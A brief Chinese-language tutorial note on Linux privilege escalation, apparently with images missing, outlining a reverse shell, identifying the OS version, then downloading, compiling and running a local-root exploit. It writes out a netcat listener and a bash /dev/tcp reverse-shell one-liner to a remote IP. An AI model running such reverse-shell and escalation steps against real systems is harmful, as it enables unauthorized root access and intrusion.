Linux下漏洞提权

Linux下的漏洞提权

　　linux下一般都是系统漏洞提权，分为以下几个步骤：

　　

提权

　　

　　　　

反弹shell

　　　　　本地：nc -l -p 8000

　　　　　目标机器：/bin/bash -i >& /dev/tcp/10.10.10.10/8000 0>&1

实例

　　　　1、得到系统版本号

　　　　　　centos 7 local root

 

　　　　　2、找到对应的exp

　　　　　　

反弹shell

　　　　　目标机运行 

　　　　　　本机hacker

 

　　　　　　　

提权　　　　　　下载exp源码；编译源码；执行exp 权限变成root